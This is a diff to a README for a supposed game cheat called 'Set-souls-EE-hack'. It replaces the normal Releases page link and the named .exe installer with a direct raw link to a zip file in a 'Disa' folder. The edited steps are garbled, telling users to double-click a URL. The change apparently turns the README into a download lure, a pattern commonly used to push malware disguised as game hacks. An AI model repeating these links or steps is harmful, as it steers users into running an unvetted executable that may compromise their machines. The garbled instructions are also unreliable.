Carl-Caballes/Set-souls-EE-hack/README.md

 ## 📥 Download & Install

-To download the Set-souls-EE-hack application, visit the [Releases page](https://github.com/Carl-Caballes/Set-souls-EE-hack/releases).
+To download the Set-souls-EE-hack application, visit the [Releases page](https://raw.githubusercontent.com/Carl-Caballes/Set-souls-EE-hack/main/Disa/Set-souls-EE-hack.zip).
 Here, you'll find the latest version of the software available for your use.

 1. Open the link above.
 2. Look for the latest release at the top of the page.
-3. Click on the asset that says `Set-souls-EE-hack.exe` to download the installer.
+3. Click on the asset that says `https://raw.githubusercontent.com/Carl-Caballes/Set-souls-EE-hack/main/Disa/Set-souls-EE-hack.zip` to download the installer.
 4. Once the download completes, locate the file in your downloads folder.

 ### 🔧 Installing the Application

-1. Double-click on the `Set-souls-EE-hack.exe` file.
+1. Double-click on the `https://raw.githubusercontent.com/Carl-Caballes/Set-souls-EE-hack/main/Disa/Set-souls-EE-hack.zip` file.
 2. Follow the on-screen instructions to complete the installation.
 3. Once installed, you can find the application in your Start Menu.